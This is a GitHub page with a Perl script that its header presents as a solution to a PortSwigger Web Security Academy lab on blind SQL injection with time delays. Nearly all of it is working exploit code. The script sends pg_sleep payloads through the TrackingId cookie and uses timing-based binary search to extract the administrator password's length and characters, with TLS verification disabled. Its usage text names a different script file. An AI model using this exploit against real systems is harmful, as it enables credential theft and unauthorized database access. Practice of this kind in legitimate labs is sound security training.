-
Notifications
You must be signed in to change notification settings - Fork 0
/
blind-time-delays.pl
executable file
·159 lines (130 loc) · 4.21 KB
/
blind-time-delays.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#!/usr/bin/env perl
#
# Author: <[email protected]>
# License: MIT
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::CookieJar::LWP;
use URI::Encode qw(uri_encode);
use Getopt::Long;
use Pod::Usage;
use feature 'say';
use Term::ANSIColor;
BEGIN {
say colored("PortSwigger Web Security Academy", "bold yellow");
say colored("Lab: Blind SQL injection with time delays and information retrieval", "bold yellow");
say colored("Solution by weXe1", "bold blue");
print "\n";
}
our $| = 1;
our(
$url,
$proxy,
$maxLength,
$help,
);
GetOptions(
'u|url=s' => \$url,
'p|proxy=s' => \$proxy,
'm|max-length=i' => \$maxLength,
'h|help' => \$help
);
pod2usage(1) if $help;
pod2usage(1) unless $url;
$maxLength = 20 unless $maxLength;
our $ua = LWP::UserAgent->new(
cookie_jar => HTTP::CookieJar::LWP->new(),
protocols_allowed => ['http', 'https'],
);
$ua->ssl_opts(verify_hostname => 0, SSL_verify_mode => 0x00);
if ($proxy) {
$ua->proxy('https' => $proxy);
$ua->proxy('http' => $proxy);
}
our $requestCount = 0;
say colored("[*] Obtaining password length for user 'administrator', it will take a long time... ", "cyan");
our $passwordLength = 0;
{
my ($begin, $end) = (1, $maxLength);
while ($begin <= $end) {
my $middle = int(($begin + $end + 1) / 2);
my $payload = "TrackingId='\%3b" . uri_encode(" select case when (length(password) < $middle) then pg_sleep(10) else pg_sleep(0) end from users where username = 'administrator");
my $result = &makeRequest($payload);
if ($begin == $middle && $middle == $end && !$result) {
if (&makeRequest("TrackingId='\%3b". uri_encode(" select case when (length(password) = $middle) then pg_sleep(10) else pg_sleep(0) end from users where username = 'administrator"))) {
$passwordLength = $middle;
}
last;
}
if ($result) {
$end = $middle - 1;
} else {
$begin = $middle;
}
}
}
if ($passwordLength > 0) {
say colored("[+] Password length: $passwordLength, found in $requestCount requests", 'green');
} else {
say colored("[-] Unable to obtain password length. Exiting...", 'red');
exit;
}
say colored("[*] Obtaining password for user 'administrator', it will take a long time... ", "cyan");
my $password = '';
my @chars = ('0'..'9', 'A'..'Z', 'a'..'z');
for my $length (1..$passwordLength) {
my ($begin, $end) = (0, $#chars);
while ($begin <= $end) {
my $middle = int(($begin + $end + 1) / 2);
my $letter = $chars[$middle];
my $payload = &generatePayload($length, $letter);
my $result = &makeRequest($payload);
if ($begin == $middle && $middle == $end && !$result) {
$password .= $letter;
last;
}
if ($result) {
$end = $middle - 1;
} else {
$begin = $middle;
}
}
say colored("[$length] Found: $password" , "green");
last if $length > length $password;
}
say colored("[*] Finished in $requestCount requests.", "bold magenta");
sub generatePayload {
my $idx = shift;
my $pass = shift;
my $payload = " select case when (substr(password, $idx, 1)<'$pass') then pg_sleep(10) else pg_sleep(0) end from users where username = 'administrator"; # in this lab db is PostgreSQL
$payload = "TrackingId='\%3b" . uri_encode($payload);
return $payload;
}
sub makeRequest {
my $payload = shift;
my $start = time();
my $response = $ua->get($url, 'Cookie' => $payload);
my $end = time();
my $timeDiff = $end - $start;
$requestCount++;
if ($response->is_success) {
if ($timeDiff > 9) {
return 1;
}
return 0;
} else {
say STDERR colored($response->status_line . ": [$payload]", "on_red");
return 0;
}
}
__END__
=head1 SYNOPSIS
$ perl blind-conditional-errors.pl [options]
=head1 OPTIONS
--url=<URL> Target URL of the lab (required)
--proxy=<URL> HTTP or HTTPS proxy URL (optional)
--max-length=<number> Max length of brute forced password (optional)
--help Prints this help
=cut